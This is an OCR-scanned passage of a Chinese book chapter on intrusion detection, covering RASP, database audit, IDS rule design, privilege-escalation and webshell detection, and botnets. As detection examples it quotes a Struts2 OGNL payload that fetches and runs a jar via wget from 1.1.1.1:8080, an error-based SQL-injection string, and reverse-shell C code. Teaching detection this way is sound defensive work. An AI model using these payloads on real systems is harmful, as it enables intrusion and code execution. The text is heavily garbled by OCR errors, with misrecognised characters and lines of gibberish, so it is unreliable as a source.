1) 在 RASP 检 测 到 关注 的 高 危 事件 时 ， 可 以 通过 打印 调用 栈 来 获 
取 高 危 调 用 前 后 的 调用 链 ， 并 以 此 快速 定位 漏洞 入 口 ， 甚 至 是 攻击 流 
程 。 如 下 调用 栈 ， 是 一 个 典型 的 struts2 漏 洞 利 用 执行 命令 时 的 调用 栈 
( 缩 略 ) 信息 : 


"stack_trace": [ 


"clazz": "java.lang.ProcessBuilder", 
"method": "start" 
}, 
{ 
"clazz": "sun.reflect.NativeMethodAccessorImpl", 
"method": "invoked" 
}, 
{ 
"clazz": "ognl.OgnlRuntime", 
"method": "callMethod" 
}, 
{ 
"clazz": "org.apache.struts2.imp1.StrutsActionProxy", 
"method": "execute" 
}, 
{ 
"clazz": "org.apache.catalina.core.StandardContextValve", 
"method": "invoke" 
} 


2) 获取 因 何 http 请 求 触发 的 API 调 用 。 我 们 可 以 从 
javax.servlet.http.HttpServlet 监 控 监控 所 有 HTTP request 请 求 的 具体 Java 
调用 栈 。 如 下 测试 用 例 抓 取 的 信息 可 以 看 到 ， 这 里 既 有 攻击 请 求 URL， 
也 有 payload， 也 有 remote 记 ， 加 上 前 面 的 漏洞 利用 点 调用 栈 前 后 信 
轧 ， 信 息 量 非常 丰富 ， 无 需 后 端 数据 分 析 系 统 再 去 组 装 碎 片 信息 ， 一 
步 到 位 |! 


"http_request": { 
"method": "GET", 
"request_uri": "/struts2-blank/example/Helloworld.action", 


"query_string": "redirect :%24{(new+ java.lang.ProcessBuilder (new+ 
java.lang.String[]{ 'wget', '1.1.1.1:8080', '-0', '/tmp/dGLlIprqPRZfgp'})) 
.start() }", 
"remote_addr": "2.2.2.2", 
"headers": [ 
{ 
"name": "host", 
"value": "3.3.3.3:8080" 
}, 
{ 
"name": "user-agent", 
"value": "Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1) " 
} 


] 
} 


2. 基 于 Java RASP 的 攻击 检测 


任何 一 种 检测 模型 的 建立 ， 是 基于 对 攻击 场景 的 理解 ， 以 及 场景 
数据 的 观察 之 上 。 


基于 高 危 行为 组 合 的 检测 模型 


从 攻击 场景 来 看 ， 攻 击 行为 基本 集中 在 文件 IO 读 写 、 命 令 执 行 、 
代码 注入 执行 、 网 络 连接 、 外 部 和 目 定义 lib 库 加 载 等 行为 ， 那 么 一 个 
webshel] 甚 至 是 漏洞 与 业务 入 口 的 区 别 就 是 前 述 众 多 高 危 调 用 是 否 同一 
时 间 徐 口内 频繁 在 同一 URI 触 发 ， 如 图 8-15 所 示 。 


基于 调用 栈 的 检测 模型 


一 个 漏洞 的 利用 ， 除 去 他 的 payload 之 外 ， 利 用 的 前 提 是 遵循 漏洞 
环境 的 调用 关系 ， 那 么 payload+ 漏 洞 触发 条 件 这 条 调用 栈 ， 束 是 对 攻击 


行为 攻击 向 量 的 最 精准 刻画 。 如 图 8-16 所 示 。 


/struts2-blank/example/HelloWorld.action 


java.lang.ProcessBuilder(new+ java.lang.String{]{ ‘wget’, '1.1.1.1:8080', ~- 
O', "Kf5zhB.jar‘})) .start() 


/struts2-blank/example/HelloWorld.action 


ProcessBuilder("/path/to/java", "-jar", "Kf5zhB.jar") 


/struts2-blank/example/HelloWorld.action 


new FileOutputStream("Kf5zhB.jar") 


图 8-15 组合 检测 模型 


/struts2-blank/example/HelloWorld.action 


"clazz": "java.io.FileOutputStream", 
"method": "<init>" 


"clazz": "metasploit. Payload", 
"method": "writeEmbeddedFile" 


í 
"clazz": "java.lang.reflect Method", 
"method": "invoke" 

} 


{ 


"clazz": "ognl.ObjectM ethodAccessor" 
"method": "callMethod" 


} 


图 8-16 ”调用 栈 的 检测 模型 


8.4 效 据 库 审 计 


一 个 企业 的 最 核心 货 产 莫 过 于 数据 ， 在 互联 网 企业 则 是 更 甚 。 近 
些 年 互联 网 企业 “去 IOE” 运 动 使 得 数据 库 产品 均 倾 同 于 mysql 或 MySQL 
衍生 产品 。 那 么 基本 上 提 到 数据 库 审 计 ， 主 要 束 是 MySQL 相 关 的 审计 
产 


H0 
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旁 路 审计 几乎 是 传统 乙方 安全 厂商 最 常见 的 模式 ， 通 过 网 络 设备 
镜像 流量 ， 审 计 设备 解码 组 包 DB 流 量 ， 并 存储 分 析 ， 通 过 模型 检测 和 
追溯 可 疑 和 高 危 事 件 。 如 图 8-17 所 示 。 


ff 


数据 库 A 数据 库 B 数据 库 C 
图 8-17 “ 旁 路 型 BD 审 计 设 备 


这 样 的 架构 好 处 在 于 部 署 简单 ， 对 于 业务 方 和 用 户 来 说 几乎 是 透 
明 的 ， 部 署 过 程 无 需 业 务 方 参与 。 同 时 对 业务 几乎 无 性 能 损耗 ， 这 也 
古 业 务 方 最 关注 的 一 上 后。 


2. 主 机 型 


SRA AA ERRA, (2S BOTS ARS RT eS 
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层出不穷 。 大 型 互联 网 公司 业务 环境 每 日 大 量 的 变更 ， 以 至 于 想 完 全 
霓 理 清楚 其 网 络 洋 构 符 别 是 DB 访问 模型 几乎 是 不 可 能 的 事 ， 至 少 很 难 
在 一 个 较 短 的 时 间 内 有 一 个 相对 静止 的 架构 图 。 


笔者 在 互联 网 企业 任职 期 间 参 与 过 几 次 DB 审计 广 商 (包括 国外 ) 
的 产品 推介 会 和 评审 ， 结 采 都 是 无 疾 而 终 。 其 产品 技术 能 力 什 么 的 都 
不 是 问题 ， 最 大 的 原因 就 是 架构 和 部 署 还 是 传统 厂商 的 模式 ， 根 本 不 
能 适应 互联 网 公司 的 环境 。 璧 如 它们 要 求 在 网 络 节点 处 部 署 ， 但 互联 
网 业务 环境 决定 了 这 种 所 谓 的 节点 太 多 太 多 ， 以 一 套 设 备 动 辑 几 十 万 
的 价格 ， 计 算 下 来 价格 已 经 是 不 可 接受 。 其 次 业务 错综复杂 的 数据 库 
访问 链 路 ， 使 得 其 仅 察 焦 于 茶 些 广 皮 的 模式 几乎 可 以 断定 一 定 会 壮 汤 
很 多 事件 。 


那么 解决 办 法 是 什么 ? 那 就 是 审计 产品 尽量 靠近 DB 本 身 部 署 ， 最 
近 的 莫 过 于 部 署 到 DB Server 主 机 上 上 ， 这 就 是 主机 型 产品 的 由 来 。 主 机 
型 的 DB 审计 产品 可 以 是 单个 进程 也 可 以 是 HIDS 的 某 个 模块 ， 参 见 图 8- 
18 ° 


数据 传输 
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Agent 


图 8-18 ”基于 HIDS 模 块 的 DB 审计 产品 


3. 代 理 型 


在 业务 架构 治理 做 得 较 好 的 公司 ， 他 的 业务 数据 读 写 均 有 统一 的 
接口 ， 无 论 业务 多 辑 多 么 复杂 ， 其 DB 流量 都 是 统一 的 入 口 ， 那 么 在 这 
些 接 口 位 置 增加 DB 审计 功能 是 最 完美 的 方案 ， 参 见 图 8-19。 


图 8-19 ”基于 代理 的 DB 审计 产品 


存储 


这 样 的 架构 市 来 了 一 个 近乎 完美 的 产品 形态 ， 有 以 下 诸多 优点 : 


部署 : 不 需要 像 其 他 产品 一 样 逐一 去 网 络 节 点 或 主机 部 署 ， 其 数 
据 采集 和 filter 功 能 原生 集成 在 业务 架构 里 。 


- 城 少 性 能 开销 ， 基 于 DB 协议 的 数据 旁 路 ， 不 需要 基于 网 络 报 文 数 
据 的 处 理 ， 组 包 等 开销 。 


4. 攻 击 检测 


DB 审计 安全 产品 主要 解决 两 个 问题 : 1) SQL 注入 拖 库 ，2) 操作 
违规 审计 。 


对 于 违规 审计 没有 太 多 需要 讲 的 ， 通 过 对 日 常 的 DB 请 求 做 好 基线 
学 习 ， 超 出 基线 范围 之 外 的 则 为 违规 行为 。 基 线 学 习 的 维度 可 以 有 以 
TJ 


:账户 对 应 的 常用 DB 访问 上 映射。 
:账户 常用 的 function ° 
:账户 十 dient_ip 与 tables 的 映射 。 


应 用 与 数据 字段 的 映射 。 


-自然 时 间 + 频 度 与 裤 表 的 映射 。 


虽然 上 述 基线 学 习 主 要 用 于 审计 ， 但 对 于 业务 相对 固定 以 及 安全 
仿 测 和 覆盖 范围 较 小 的 安全 系统 来 说 ， 用 于 做 攻击 检测 也 是 够 用 的 。 因 
为 攻击 行为 也 是 超出 基线 范围 的 。 


对 于 业务 较 多 、 变 更 较 多 的 企业 ， 上 述 方式 用 于 攻击 检测 显然 不 
适合 了 ， 相 对 于 业务 的 生命 周期 、 变 更 周期 来 说 基线 的 学 习 期 过 长 。 
SQL 注 入 攻击 通常 的 检测 方式 是 使 用 相对 固化 的 字符 串 特 征 匹 配 ， 而 
这 类 检测 方式 会 面临 各 种 变形 SQL 语 句 的 绕 过 攻击 。 


事实 上 无 论 黑 客 如 何 变 换 攻击 负载， 它 最 终 要 能 被 DB 解析 ， 满 足 
语法 要 求 。 那 么 通过 语法 解析 万 的 还 原 ， 任 何 的 伪 少 均 会 银 去 。 


语法 解析 之 后 的 语句 就 需要 定义 辨别 是 否 恶 意 的 请 求 了 ， 诸 如 以 
下 几 种 场景 : 


ALATE Wo E 合 查 询 且 查询 系统 库 表 。 
.可 能 导致 SQL 查询 失败 的 语句 。 
.多 个 联合 查询 ， 且 子 查询 非 业 务 所 需 库 表 。 


将 原始 SQL 请 求 使 用 语法 解析 器 (Python 的 sqlpare 模 块 格式 化 之 
后 的 语句 ， 可 以 浓 晰 地 看 到 SQL 语 句 被 递归 拆 分 成 了 functiont+parameter 
的 展现 形式 : 


print(sqlparse.format('select msg from news where id=2 and(select 1 from(select 
count(*),concat((select (select (SELECT distinct concat(0x7e, 0x27,md5(1122),0 
x27,0x7e) FROM modoer_admin LIMIT 0,1)) from information_schema.tables limit 
0,1),floor(rand(0)*2))x from information_schema.tables group by 
x)a)',reindent=True) ) 

select msg 


from news 
where id=2 and 
(select 1 
from 
(select count(*),concat( 
(select 
(select 


(SELECT distinct 
concat (Ox7e, 0x27,md5(1122),0x27,0x7e) 
FROM modoer_admin LIMIT 0,1)) 
from information_schema.tables limit 
0,1), floor(rand(0)*2))x 
from information_schema. tables 
group by x)a) 


其 实 SQL 注 入 就 是 本 该 只 允许 输入 parameter 的 地 方 被 恶意 插入 了 
function 调 用 且 被 执行 。 那 么 如 何 检测 则 应 该 清楚 了 。 


8.5 ”入侵 检 测 数 据 分 析 平 台 


8.5.1 ” 染 构 选择 


` 


常规 的 安全 产品 可 能 是 一 个 杀毒 软件 、 一 个 IDS、 一 个 WAF， 这 能 
解决 一 个 单 点 安全 问题 ， 但 如 果 没 有 全 局 的 信息 汇聚 与 分 析 ， 很 难 实 
现 对 全 局 态势 的 感知 。 


云 计 算 与 云 安全 是 常 被 提起 的 概念 ， 在 大 型 网 络 中 ， 因 应 用 服务 
锅 对 于 性 能 消耗 较为 敏感 ， 很 多 复杂 的 安全 分 析 逻 辑 不 易 被 业务 部 门 
接受 ， 部署 于 主机 和 网 络 上 的 设备 只 被 限制 在 实现 提取 数据 功能 。 分 
析 与 计算 在 后 端 也 殉 是 所 谓 的 云端 来 实现 。 


采集 与 计算 的 分 离 市 来 了 诸多 优点 : 


假设 (几乎 是 必然 出 现 ) 单 点 系统 被 黑客 攻陷 ， 安 全 人 策略 不 易 被 
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干扰 业务 系统 的 稳定 ; 


原始 数据 的 短 时 存储 ， 便 于 对 事件 演变 过 程 的 重 现 ， 方 便 追 调 审 
计 ， 以 及 预 研 新 检测 逻辑 的 验证 。 


8.5.2 ”功能 模块 


大 型 网 络 的 安全 监测 产品 通常 有 各 类 SOC 系 统 、 分 布 式 安全 产 
品 ， 以 及 云 安全 产品 。 产 品 形式 千变万化 ， 但 功能 模块 可 以 简化 如 图 8- 
20 所 示 。 


入 侵 检测 体系 


ose [mae 
络 数 据 || 主 机 信息 || 应 用 服 || 数据 格 |) 入侵 检 |) 全 局 数 
采集 采集 外务 记录 | R fh 测 规则 |) 据 挖掘 


图 8-20 “入侵 检 测 体 系 模块 


通常 SOC 系 统 会 收集 各 种 日 志 ， 各 种 NIDS\HIDS 都 有 数据 采集 功 
。 尽 可 能 多 的 采集 数据 对 于 入 侵 分 析 是 很 有 帮助 的 。 


但 我 们 面 对 入 侵 事 件 时 ， 常 常 面 临 两 种 尴 深 局面 : 


-数据 很 少 。 仅 有 部 分 系统 \ 必 用 默认 日 志 。 如 侦探 破案 一 般 ， 发 现 
入 侵 事 件 最 重要 的 是 有 证 据 。 通 党 系统 默认 的 日 志 等 数据 无 法 满足 入 
侵 事 件 分 析 需 求 ， 必 须 开 发 专门 的 探测 器 。 先 需要 梳理 场景 对 抗 需 
求 ， 搞 清楚 检测 芭 类 攻击 所 需 数据 类 别 与 纬度 ， 并 将 此 作为 数据 采集 
系统 的 开发 需求 ， 过 程 如 图 8-21 所 示 。 


入 侵 场 景 检测 规则 数据 纬度 - 开发 需求 


图 8-21 数据 需求 


-数据 很 多 。 大 型 网 络 中 各 类 数据 很 多 ， 甚 至 多 至 无 法 记录 。 数 据 
并 非 越 多 越 好 ， 特 别 是 大 型 网 络 的 海量 数据 ， 如 全 部 汇集 存储 是 难以 
文 撑 的 。 且 大 量 的 噪音 数据 也 只 会 带 来 硬件 与 人 力 成 本 的 增加 。 真 正 
流入 最 后 存储 与 分 析 系 统 的 数据 ， 必 然 是 经 过 精简 与 格式 化 之 后 的 ， 
如 图 8-22 所 示 。 


按 需 采集 规则 筛选 


图 8-22 ”数据 精简 


2. 数 据 分 析 


有 了 数据 不 等 于 有 检测 能 力 ， 首 先 第 一 个 问题 融 是 如 何 理解 你 获 
得 的 数据 ， 这 就是 数据 格式 化 。 


定义 格式 化 数据 需 做 以 下 工作 : 

分析 规则 决定 数据 纬度 。 

关联 逻辑 定义 字段 扩展 。 

有 了 格式 化 好 的 数据 ， 殊 实现 了 数据 目 动 化 分 析 的 第 一 步 ， 接 下 


来 才 是 分 析 引 警 与 规则 建设 。 


8.5.3 ”分析 能 力 


但 凡 有 一 点 渗透 经 验 的 人 ， 对 于 无 论 是 杀毒 软件 还 是 WAFNDS 系 
统 都 知道 使 用 各 种 逃避 检测 的 手段 。 现 在 我 们 面 对 的 是 有 一 定 反 检测 
能 力 的 攻击 者 ， 特 别 是 融 级 APT 攻 击 通常 较为 隐蔽 ， 不 易 触 发 单 点 的 
安全 策略 和 检测 ， 需 要 更 多 纬度 和 大 视角 的 数据 分 析 。 


传统 安全 产品 单纯 依靠 特征 库 的 检测 模式 ， 效 有 果 已 大 打折 扣 。 黑 
客 工具 千变万化 ， 攻 击 手 法 层出不穷 ， 但 他 们 的 目的 不 变 ， 行 为 是 殊 
途 同 归 的 。 所 以 ， 在原 有 特征 检测 技术 之 外 ， 用 行为 模型 能 更 好 地 检 
测 入 侵 ， 我 们 提出 以 下 检测 模型 。 


1. 单 点 事件 摘 述 数据 的 行为 分 析 


例如 一 个 进程 的 启动 ， 进 程 自 身 的 行为 与 环境 信息 ， 如 图 8-23 所 
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BL] Trustedinstaller. exe 
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这 里 你 看 到 了 什么 ? 以 下 均 可 作为 恶意 进程 检测 规则 。 


` 父 进程 为 IE。 


.进程 运行 在 下 缓存 目录 。 


-进程 PE 信息 : 加 碗 ， 未 签名 ， 多 个 PE 头 部 等 。 
LEPASAN 


例如 一 个 进程 状态 的 变化 ， 以 及 父子 进程 状态 的 变化 ， 如 图 8-24 所 
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这 是 ProFTPD 的 一 个 远程 缓冲 区 洲 出 漏洞 攻击 后 的 结果 ， 从 pstree 
可 以 看 到 proftpd 进 程 派生 了 一 个 bash 子 进程 。 正 常情 况 下 bash 通 常 只 会 
从 系统 登录 后 的 SSHDNogin 等 进程 局 动 ， 这 可 作为 一 个 异 币 告警 逻 
辑 。 大 家 再 想 想 这 个 场景 还 会 有 那些 特征 ? 


-firefox---run-mozilla. s)---firefox-bin-+-plugin-containe---{p 
| | 


-gnome-terminal-+-3*[ bash) 


|-bash-+-grep 

| -ba netcat 
-Qvfsd-tra 
-proftpd--- 
-SHhd 


图 8-24 ”ProFTPD 漏 洞 


3. 规 则 摘 述 


规则 代码 的 示例 如 下 所 示 : 


"dsc":"Remote code execute", 
"cache": { 
Socket=1, 
cmd!=sshd|logoin 


了 

"rule": { 
ip=cache.ip, 
ppid=cache.ip.pid, 
cmd=/bin/shell 


4. 多 数据 纬度 关联 分 析 
例如 : NIDS 与 HIDS 的 数据 联动 分 析 ， 如 图 8-25 所 示 。 
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FERLA] p | TERES | Ey 
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NIDS HIDS 
图 8-25 ”多 系统 数据 关联 


NIDS 上 出 现 非 正 常 业务 逻辑 的 文件 上 传 事件 ， 与 此 几乎 同时 ， 
HIDS 出 现 一 个 CGI 文 件 生成 事件 ， 可 作为 可 疑 webshell 上 传 行为 规则 。 
上 上 传 漏洞 千变万化 ， 导 致 入 侵 痢 能 上 传 webshell 的 原因 也 千奇百怪 ， 我 
们 勿 需 为 每 一 个 Web 汤 洞 建立 检测 规则 ， 形 成 胱 肿 的 规则 库 ， 只 要 符合 
上 上述 行为 特征 ， 束 能 被 发 现 。 


总 结 上 诉 架构 与 分 析 逻 辑 ， 我 们 得 出 整体 架构 图 见 图 8-26 © 


= 
GS 


应 用 服务 器 


图 8-26 入侵 检测 系统 简化 架构 


8.5.4 实战 演示 


前 面 详 洋酒 洒 写 那么 多 ， 不 如 实战 来 得 实际 。 下 面 我 们 通过 对 一 
个 确切 的 攻击 场景 实现 检测 能 力 来 实践 前 面 的 思路 。 


1. 场 景 分 析 


在 黑客 入 侵 过 程 中 ， 通 常 有 一 个 环节 ， 就 是 通过 漏洞 对 自 号 拥有 
的 权限 进行 提升 ， 简 称 提 权 。 和 常见 的 提 权 手法 是 ， 发 现 系 统 存在 的 漏 
洞 ， 技 行 漏 洞 利 用 程序 ，exp 利 用 漏洞 获取 一 个 高 权限 的 shel， 如 图 8- 
27 所 示 。 


执行 explcit 


CVE 2013-3660 
CVE 2009-2692 


ecmd.exe(user=system) 
¢/bin/bash(uid=0) 


*EPATHOBJ exp.exe 
esock_sendpage.c 


高 权限 shell 


图 8-27 ” 提 权 行为 分 析 


2. 检 测 思 路 


通过 前 面 的 分 机 和 调试 ， 我 们 会 发 现 一 个 提 权 攻击 中 的 特点 ， 那 
号 是 exploit 工 具 上 自身 在 执行 时 是 低 权 限 ， 而 得 到 的 shell 是 高 权限 。 


有 了 对 场景 的 清晰 认识 ， 检 测 逻 辑 也 就 很 清楚 了 : 


某 个 高 权限 (system? uid=0? ) 进程 (bash? cmd.exe? ) 的 父 进 
程 为 低 权 限 ， 则 告警 。 


3. 系 统 实现 


数据 采集 需求 : 根据 前 面 大 节 中 的 思路 ， 我 们 有 了 场景 有 了 规 
则 ， 可 以 考虑 采集 那些 数据 以 及 数据 纬度 了 。 在 这 个 场景 中 ， 规 则 分 
析 至 少 需要 用 到 几 个 必 备 的 进程 数据 纬度 : 进程 权限 、 进 程 ID、 父 进 
程 ID。 


规则 逻辑 如 下 : 


"dsc":"Local Privilege Escalation", 
"cache": { 
uid>0 


}, 

"rule": { 
ip=cache.ip, 
ppid=cache.ip.pid 
uid=0 


以 上 检测 规则 基本 上 能 满足 多 数据 权 场 景 ， 但 实际 运用 中 还 有 一 
些 细节 需 读 者 自己 去 思考 完善 ， 例 如 


-同样 满足 父 进程 权限 低 ， 子 进程 权限 高 的 正常 场景 有 哪些 ， 如 何 
去 除 误 报 ? 


DEA AF, OTT HE ide Se DS, E 
符合 你 目 己 分 析 系 统 的 架构 ? 


- 提 权 攻击 除了 上 述 提 到 的 场景 ， 还 有 了 哪些? 


BUNA AGE, MT ATUVRA DIB oe, MSE Re 
测 ， 纵 使 攻击 手法 千变万化 ， 而 关键 路 径 是 不 易 改 变 的 。 通 过 行为 模 
型 实现 检测 能 力 ， 避 人 免 了 各 目 漏 润 技术 细 市 差异 市 来 的 规则 库 匈 余 
( 且 影 响 安 全 系统 性 能 ) ， 也 避免 因 检 测 规 则 过 分 针对 细 市 (特征 库 
\ 漏 洞 库 ) 可 能 导致 的 被 绕 过 。 


以 上 是 在 实际 入 侵 对 抗 实践 中 ， 根 据 公 司 网 络 自身 环境 ， 外 部 威 
胁 特点 不 断 总 结 出 来 一 些 浅 显 经 验 。 忆 的 归纳 为 ， 入侵 事 件数 据 化 、 
入 侵 检 测 模型 化 、 事 件 分 析 平 台 化 。 


在 针对 不 同 网 络 环境 、 安 全 威胁 形势 、 对 抗 要 求 ， 还 须 结 合 目 身 
情况 做 不 少 优化 和 变化 。 个 人 认为 前 述 无 论 是 染 构 还 是 数据 分 析 模 
型 ， 是 在 现 有 网 络 海量 数据 、 业 务 环境 苛刻 、 外 部 威胁 多 变 的 情况 下 


一 种 较为 经 济 易 行 的 入 侵 检 测 思 路 。 


8.6 入 侵 检测 数据 模型 


在 入 侵 检 测 攻 防 对 抗 中 ， 通 营 我 们 的 做 法 十 对 每 一 类 攻击 场景 给 
出 检测 规则 ， 防 守 方 往往 处 于 被 动 的 境地 ， 因 为 攻 方 有 太 多 的 绕 过 与 
逃 侈 手段 ， 使 得 我 们 面 对 大 量 的 漏洞 和 攻击 手法 而 手足 无 措 。 下 面 通 
过 对 入 侵 场景 的 细致 分 析 ， 转 换 视角 来 帮助 大 家 扭转 防守 方 的 被 动 局 
面 。 


1.“ 我 们 的 ”战场 


说 起 攻防 对 抗 ， 大 家 很 熟悉 的 一 句 话 是 : “攻击 只 需 一 点 即 可 得 
手 ， 而 防守 必须 全 面 设防 ”。 可 见 多 数 时 候 ， 防 守 方 很 被 动 。 但 在 我 看 
来 ， 防 守 方 其 实 是 有 优势 的 。 无 论 坏人 多 么 狐 独 ， 他 也 是 在 我 们 的 主 
场 作战 。 我 的 系统 我 做 主 ， 孙 猴子 再 怎么 折腾 也 逃 不 出 如 来 佛 的 五 指 
tL} 。 


目前 常见 的 攻击 手法 都 是 针对 目标 的 Web 系 统 ， 或 主机 系统 层面 。 
既然 整个 战场 所 在 的 操作 系统 以 及 网 络 设备 均 是 防守 方 的 ， 理 论 上 我 
们 可 以 在 任意 纬度 构建 安全 产品 和 制定 安全 策略 ， 相 对 来 说 攻击 行为 
则 处 一 个 较 低 纬度 领域 的 活动 。 如 何 理解 这 个 纬度 呢 ， 我 们 移 用 一 张 
图 来 展示 我 们 的 战场 纬度 ， 如 图 8-28 所 示 。 
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图 8-28 ”战场 纵深 视图 


2. 高 维 防守 


当 攻防 双方 在 同一 纬度 时 ， 攻 击 者 会 有 很 多 途径 实现 攻击 ， 而 防 
守 策 略 必须 不 断 地 县 加 来 封 堵 ， 往 往 疲 于 奔 命 。 我 认为 像 杀 毒 软件 或 
各 色 IPSNDS 那 样 不 断 标 加 特征 码 的 方式 ， 在 互联 网 公司 安全 团队 有 限 
的 人 力 资 源 条 件 下 ， 去 做 这 么 一 件 需 长 年 累 月 投入 人 力 且 收效 未 必 很 
好 的 事 是 非常 不 可 取 的 。 
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从 图 8-31 可 以 看 到 无 论 什 么 入 侵 行为 ， 都 对 应 着 更 高 一 纬度 的 系统 
功能 和 能 力 文 持 。 在 我 们 的 主场 ， 为 什么 放 着 这 些 有 利 的 条 件 不 用 
呢 。 与 攻击 者 针尖 对 麦 芒 地 在 低 纬度 对 抗 ， 犹 如 遭受 了 《三 体 》 中 
的 “ 降 维 攻击 ”， 十 不 明智 的 做 法 。 


在 制定 策略 前 ， 完 分 析 一 下 入 侵 场 景 中 如 “webshell 上 传 ” 在 各 个 闹 
度 都 有 哪些 事件 发 生 ， 如 图 8-29 所 示 。 
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图 8-29 webshell 上 传 在 各 纬度 事件 
3. 策 略 实践 


梳理 清楚 了 “webshell 上 传 ”这 个 场景 在 各 纬度 的 技术 细 市 ， 如 何 制 
定 不 易 绕 过 的 策略 就 相对 容易 了 。 


网 络 层 ， 不 用 去 考虑 添加 N 个 规则 去 应 对 诸如 “XXeditor 上 传 漏 
洞 "、“XXCMS 上 传 漏洞 "?， 要 知道 无 论 什 么 漏洞 和 哪 种 猥琐 的 攻击 ， 
站 是 要 符合 HTTP 协议 ， 那 从 高 纬度 的 HITP 协 议 入 手 , “检测 符合 
RFC1867 标 准 的 上 传 CGI 行 为 ”: 


content 


CGI 层 ， 无 论 什 么 CGI 漏洞 导致 的 上 传 ， 漏 洞 代 码 几 乎 都 用 有 
fopen 等 写 文 件 的 操作 ， 这 里 我 们 关注 fopen 等 写 CGI 文 件 的 API 事 件 即 


系统 用 户 态 ， 通 过 检测 系统 层面 的 API 调 用 行为 ， 比 如 写 模 式 open 
CGI (ft) ， 来 发 现 webshell 上 传 几乎 对 于 攻击 者 来 说 几乎 很 难 绕 过 
仿 测 了 ， 除 非 websvr 直 接 是 root 启 动 且 能 加 载 任意 代码 ; 


系统 内 核 态 ， 通 过 内 核 inotify 事 件 来 发 现 CGI 创 建行 为 ， 在 这 一 层 
我 们 甚至 不 担心 root 启 动 的 websvr 加 载 亚 意 代 码 带 来 的 可 能 的 逃逸 检 
测 ， 至 少 在 完成 后 续 的 攻击 之 前 的 可 疑 行 为 必定 被 发 现 : 


总 结 之 后 ， 我 们 的 检测 系统 如 图 8-30 所 示 ， 有 了 立体 纵深 结构 。 
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图 8-30 ”高 维 防守 
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毕竟 有 限 ， 防 守 方 在 高 一 纬度 对 事件 的 观察 与 检测 让 攻击 方 很 难 逃 
逸 。 但 也 要 注意 一 点 ， 对 入 侵 \ 漏 洞 场 景 的 细致 分 机 ， 以 及 入 侵 场景 ; 
链 环 市 的 提炼 也 是 策略 制定 的 关键 ,否则 也 会 陷入 不 断 为 旧 宽 上 略 打 补 
TAUIA o 


要 解决 一 个 入 侵 场景 ， 在 制定 策略 之 前 做 好 足够 的 分 析 并 提炼 其 
最 核心 的 技术 点 ， 贴 近 此 特征 制定 策略 效果 束 非 党 好， 且 不 易 被 绕 
。 下 面 选择 两 个 Linux 系 统 第 见 的 木马 场景 和 案例 来 说 明 。 


ene 


熟悉 恶意 代码 取证 的 同学 应 该 清楚 常见 的 反 连 木马 ，' 核 心 ' 代 码 部 
分 一 般 是 这 样 的 ; 
connect(sockfd, (struct sockaddr *)&cliaddr, sizeof(struct Sockaddr ) )， 
dup2(sockfd, 1); 


dup2(sockfd, 2); 
execve("/bin/sh", "sh", envp); 


那 我 们 检测 十 分 简单 ， 通 常 一 个 bash 进 程 是 不 会 有 网 络 连接 的 ， 所 
以 检测 策略 是 bash 的 STDIN STDOUT 绑 定 了 socket 则 为 森马， 如 图 8-31 
所 示 。 


木马 shell(bash\sh...) 
* STDIN\STDOUT 重 定向 
到 SOCKET 


普通 bash\sh... 
。 无 网 络 连 接 


图 8-31 ”常规 Linux 反 连 shell 检 测 思 路 


但 有 一 些 老练 的 攻击 者 的 代码 则 不 会 那么 偷懒 ， 壁 如 mod_rootme 

这 个 木马 ， 为 了 复 用 Apache 的 监听 端口 以 及 获得 root 权 限 的 shell， 在 代 
码 逻 辑 上 做 了 很 多 精巧 的 变换 组 合 ， 使 得 检测 不 可 能 象 前 述 那 类 普通 
木马 一 样 方便 。TSRC 官 微 曾经 有 分 享 过 
(http://t.qq.com/p/t/330573116082464 ) 如 何 发 现 mod_rootme 这 类 极为 
隐蔽 的 后 门 ， 如 图 8-32 所 示 。 再 狐 猎 的 后 门 也 有 异 于 系统 正常 行为 的 地 
方 ， 根 据 异 常 行为 建立 策略 是 相 比 那 类 签名 特征 更 为 靠 谱 的 检测 手 
段 。 


HTTPD 


C) libnss_dns-2.4.so 
© libnss_files-2.4.so 


mod_rootme.so 


*>=2 个 root 权 限 httpd 进 程 
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图 8-32 ”Mod rootme 检 测 思 路 


安全 设备 与 检测 系统 布置 在 合适 的 纬度 使 得 防守 处 于 非常 有 利 的 
位 置 ， 同 时 尽 可 能 的 提炼 入 侵 场 景 的 关键 环节 ， 则 有 是 检 测 思 想 的 精 
Be 。 


我 认为 甲 方 安全 团队 尽量 避免 做 看 似 大 而 全 ， 针 对 每 一 类 漏洞 和 
墨客 攻击 手法 制定 策略 的 思路 。 而 要 针对 目 身 业 务 特点 ， 分 析 其 主要 


风险 ， 针 对 性 的 制定 策略 。 将 有 限 的 货源 用 于 对 抗 请 晰 的 风险 场景 ， 
是 更 为 可 取 且 有 效率 的 事 。 


8.7 ”数据 链 生 态 一 一 僵尸 网 络 


接 入 了 互联 网 的 业务 被 攻击 是 难免 的 ， 尽 早 检 测 ， 做 好 事件 调 源 
分 析 和 情报 共享 ， 及 时 控制 其 蔓延 危害 网 络 ， 亡 羊 补 牢 为 时 未 晚 。 等 
别 是 应 对 类 似 于 僵尸 网 络 这 类 攻击 非常 有 效 。 


8.7.1 僵尸 网 络 传播 


botnet 或 蠕虫， 一 个 重要 的 特征 融 是 目 动 传播 能 力 ， 这 里 介绍 2 类 
常见 的 传播 方式 。 


漏洞 传播 一 一 为 了 快速 获取 大 量 被 控 僵 尸 肉 鸡 ， 攻 击 者 会 及 时 更 
新 攻击 模块 。 笔 者 有 一 个 经 验 ， 每 次 在 检测 到 有 新 一 波 攻 击 手法 时 ， 
去 查 查 最 近 公 开 的 漏洞 或 许 丈 能 看 到 。 同 时 作 态 僵尸 网 络 大 范围 的 攻 
击 行为 《甚至 是 漫 无 目的 的 ) ， 几 乎 可 以 预见 到 的 是 他 的 行为 和 攻击 
方式 100% 会 被 侦察 到 ， 所 以 他 们 不 会 使 用 最 新 0day。 用 1day 征 权衡 两 
者 最 经 济 的 方式 ， 并 且 偶 爱 能 直接 执行 命令 的 类 型 ， 璧 如 : struts2 
RCE、JBoss DeploymentFileRepository WAR Deployment、CVE-2012- 


1823 (PHP-CGIRCE) 等 。 


自动 化 攻击 工具 一 漏洞 常 有 ， 而 装 有 存在 漏洞 的 软件 的 服务 器 
不 常 有 ， 但 人 的 弱点 总 是 避免 不 了 的 。 比 如 弱 口 令 问 题 ， 现 如 今 最 古 


老 的 弱 口 令 猜 解 攻 击 依然 存在 ，ssh\ftpNdpvtelnet 等 等 ， 加 之 tomcat 管 理 
后 全 等 各 种 口令 。 现 在 越 来 越 快 的 网 速 ， 越 来 越 强 的 硬件 性 能 使 之 效 
